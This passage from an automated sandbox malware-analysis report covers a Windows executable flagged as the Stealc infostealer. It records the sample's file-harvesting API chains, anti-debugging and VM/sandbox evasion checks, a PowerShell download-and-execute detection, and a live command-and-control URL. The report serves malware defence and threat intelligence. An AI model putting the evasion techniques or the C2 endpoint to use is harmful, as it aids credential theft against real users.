              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_008F24E0 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,1_2_008F24E0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_008F24F9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,1_2_008F24F9
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_008F4C70 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_008F4C70
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_008FCDD0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_008FCDD0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_008E16A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_008E16A0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_008E16B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,1_2_008E16B9
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_008FD720 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_008FD720
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_008FDF20 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,1_2_008FDF20
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00901DC0 lstrcpy,ExitProcess,GetSystemInfo,ExitProcess,GetUserDefaultLangID,ExitProcess,ExitProcess,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,OpenEventA,CloseHandle,Sleep,OpenEventA,CreateEventA,CloseHandle,ExitProcess,1_2_00901DC0
              Source: file.exe, file.exe, 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: file.exe, 00000001.00000003.2188621265.0000000004F70000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: iMSHN6QKQEMUh;=a
              Source: file.exe, file.exe, 00000001.00000003.2188621265.0000000004F70000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: MSHN6QKQEMU
              Source: file.exe, 00000001.00000002.2277505797.0000000001324000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
              Source: file.exe, 00000001.00000002.2277505797.00000000012DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
              Source: file.exe, 00000001.00000002.2277505797.0000000001356000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: file.exe, 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_1-27371
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_1-27363
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_1-27215
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_1-27234
              Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Hides threads from debuggers
              Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
              Tries to detect sandboxes and other dynamic analysis tools (window names)
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_008E4A60 VirtualProtect 00000000,00000004,00000100,?1_2_008E4A60
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_009068F0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_009068F0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_009065A0 mov eax, dword ptr fs:[00000030h]1_2_009065A0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00902910 GetWindowsDirectoryA,GetVolumeInformationA,GetProcessHeap,RtlAllocateHeap,wsprintfA,1_2_00902910
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Yara detected Powershell download and execute
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 7028, type: MEMORYSTR
              Searches for specific processes (likely to inject)
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_009048B0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,1_2_009048B0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00904820 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle,1_2_00904820
              Source: file.exe, file.exe, 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: S#LProgram Manager
              Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,1_2_00902F30
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00904040 lstrcpy,lstrcpy,GetSystemTime,1_2_00904040
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00902C10 GetProcessHeap,RtlAllocateHeap,GetUserNameA,1_2_00902C10
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00902DE0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,1_2_00902DE0

              Stealing of Sensitive Information

              barindex
              Yara detected Stealc
              Source: Yara matchFile source: 00000001.00000003.2188621265.0000000004F70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.2277505797.00000000012DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 7028, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP

              Remote Access Functionality

              barindex
              Yara detected Stealc
              Source: Yara matchFile source: 00000001.00000003.2188621265.0000000004F70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.2277505797.00000000012DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 7028, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Command and Scripting Interpreter              		1
              Create Account              		11
              Process Injection              		1
              Masquerading              		OS Credential Dumping2
              System Time Discovery              		Remote Services1
              Archive Collected Data              		2
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts13
              Native API              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		43
              Virtualization/Sandbox Evasion              		LSASS Memory741
              Security Software Discovery              		Remote Desktop ProtocolData from Removable Media2
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
              Disable or Modify Tools              		Security Account Manager43
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive2
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
              Process Injection              		NTDS13
              Process Discovery              		Distributed Component Object ModelInput Capture12
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Deobfuscate/Decode Files or Information              		LSA Secrets1
              Account Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
              Obfuscated Files or Information              		Cached Domain Credentials1
              System Owner/User Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
              Software Packing              		DCSync1
              File and Directory Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              DLL Side-Loading              		Proc Filesystem324
              System Information Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              file.exe100%AviraTR/Crypt.TPM.Gen
              file.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://185.215.113.206/c4becf79229cb002.php6/E100%Avira URL Cloudmalware
              http://185.215.113.206/c4becf79229cb002.php2.Y100%Avira URL Cloudmalware
              http://185.215.113.206/c4becf79229cb002.phpR.100%Avira URL Cloudmalware

              Domains and IPs

              Contacted Domains

              No contacted domains info

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://185.215.113.206/c4becf79229cb002.phpfalse
                		high
                http://185.215.113.206/false
                  		high

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://185.215.113.206/c4becf79229cb002.php6/Efile.exe, 00000001.00000002.2277505797.0000000001349000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  http://185.215.113.206/c4becf79229cb002.php/file.exe, 00000001.00000002.2277505797.0000000001338000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    http://185.215.113.206/c4becf79229cb002.php2.Yfile.exe, 00000001.00000002.2277505797.0000000001349000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://185.215.113.206/c4becf79229cb002.phpR.file.exe, 00000001.00000002.2277505797.0000000001349000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://185.215.113.206file.exe, 00000001.00000002.2277505797.00000000012DE000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      http://185.215.113.206/:file.exe, 00000001.00000002.2277505797.0000000001338000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        http://185.215.113.206/9file.exe, 00000001.00000002.2277505797.0000000001338000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          185.215.113.206
                          		unknownPortugal
                          		206894WHOLESALECONNECTIONSNLtrue

                          General Information

                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1565981
                          Start date and time:2024-12-01 03:31:12 +01:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 4m 42s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:16
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:file.exe
                          Detection:MAL
                          Classification:mal100.troj.evad.winEXE@1/0@0/1
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 78%
                          • Number of executed functions: 19
                          • Number of non-executed functions: 124
                          Cookbook Comments:
                          • Found application associated with file extension: .exe

                          Warnings

                          • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, tse1.mm.bing.net, arc.msn.com, fe3cr.delivery.mp.microsoft.com
                          • Report size getting too big, too many NtQueryValueKey calls found.

                          Simulations

                          Behavior and APIs

                          No simulations

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          185.215.113.206file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                          • 185.215.113.206/c4becf79229cb002.php
                          file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                          • 185.215.113.206/c4becf79229cb002.php
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.206/c4becf79229cb002.php
                          file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, StealcBrowse
                          • 185.215.113.206/c4becf79229cb002.php
                          file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                          • 185.215.113.206/c4becf79229cb002.php
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.206/c4becf79229cb002.php
                          file.exeGet hashmaliciousAmadey, HTMLPhisher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                          • 185.215.113.206/c4becf79229cb002.php
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.206/c4becf79229cb002.php
                          file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                          • 185.215.113.206/c4becf79229cb002.php
                          file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                          • 185.215.113.206/c4becf79229cb002.php

                          Domains

                          No context

                          ASNs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                          • 185.215.113.206
                          file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                          • 185.215.113.206
                          file.exeGet hashmaliciousLummaC StealerBrowse
                          • 185.215.113.16
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.206
                          file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, StealcBrowse
                          • 185.215.113.16
                          file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                          • 185.215.113.206
                          file.exeGet hashmaliciousLummaC StealerBrowse
                          • 185.215.113.16
                          file.exeGet hashmaliciousStealcBrowse
                          • 185.215.113.206
                          file.exeGet hashmaliciousAmadey, CryptbotBrowse
                          • 185.215.113.43
                          file.exeGet hashmaliciousAmadey, HTMLPhisher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                          • 185.215.113.206

                          JA3 Fingerprints

                          No context

                          Dropped Files

                          No context

                          Created / dropped Files

                          No created / dropped files found

                          Static File Info

                          General

                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Entropy (8bit):7.946292204035531
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 99.96%
                          • Generic Win/DOS Executable (2004/3) 0.02%
                          • DOS Executable Generic (2002/1) 0.02%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:file.exe
                          File size:1'785'856 bytes
                          MD5:a8d083b25843d8b182146793d9665ac5
                          SHA1:7d64723ba2c0fa76e3f1126d3583331364e8815e
                          SHA256:4597e4ff598b3353854bce87b300cc65cab353aad474b32fb2768b6931983973
                          SHA512:9503ec6a8959f4619108c21abf8911a721474ac486146be44362f9ceeccc5cc8a2c751546aa28215c5a0683f3785548e8ba038b74cf8fb56f8b2953afec0cd40
                          SSDEEP:49152:FJBBIrjohooe3Qt4W8IexdFJeqJSpSmzm:jBBIrjOorgVe5Sp2
                          TLSH:86853331F2721FAEE89CA2F824BB53027274D1A205D392ED77907E5E6D6131BD865833
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8...k...k...k..'k...k...k...k..&k...k...k...k...k...k...j...k...k...k..#k...k...k...kRich...k........PE..L...<.Jg...........

                          File Icon

                          Icon Hash:00928e8e8686b000

                          Static PE Info

                          General

                          Entrypoint:0xa8d000
                          Entrypoint Section:.taggant
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                          Time Stamp:0x674AE73C [Sat Nov 30 10:21:48 2024 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:5
                          OS Version Minor:1
                          File Version Major:5
                          File Version Minor:1
                          Subsystem Version Major:5
                          Subsystem Version Minor:1
                          Import Hash:2eabe9054cad5152567f0699947a2c5b

                          Entrypoint Preview

                          Instruction
                          jmp 00007FA1D8B16FEAh
                          hint_nop dword ptr [ebx]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add cl, ch
                          add byte ptr [eax], ah
                          add byte ptr [eax], al
                          add byte ptr [edx], al
                          or al, byte ptr [eax]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], dh
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], 00000000h
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          or al, 80h
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          adc byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add cl, byte ptr [edx]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          adc byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add ecx, dword ptr [edx]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          or byte ptr [eax+00000000h], al
                          add byte ptr [eax], al
                          adc byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add cl, byte ptr [edx]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          xor byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], 00000000h
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [edi], al
                          add byte ptr [eax], 00000000h
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          adc byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add cl, byte ptr [edx]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          xor byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          or byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          and al, byte ptr [eax]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add dword ptr [eax+00000000h], eax
                          add byte ptr [eax], al

                          Rich Headers

                          Programming Language:
                          • [C++] VS2010 build 30319
                          • [ASM] VS2010 build 30319
                          • [ C ] VS2010 build 30319
                          • [ C ] VS2008 SP1 build 30729
                          • [IMP] VS2008 SP1 build 30729
                          • [LNK] VS2010 build 30319

                          Data Directories

                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IMPORT0x24b04d0x61.idata
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x24a0000x1f0.rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x24b1f80x8.idata
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
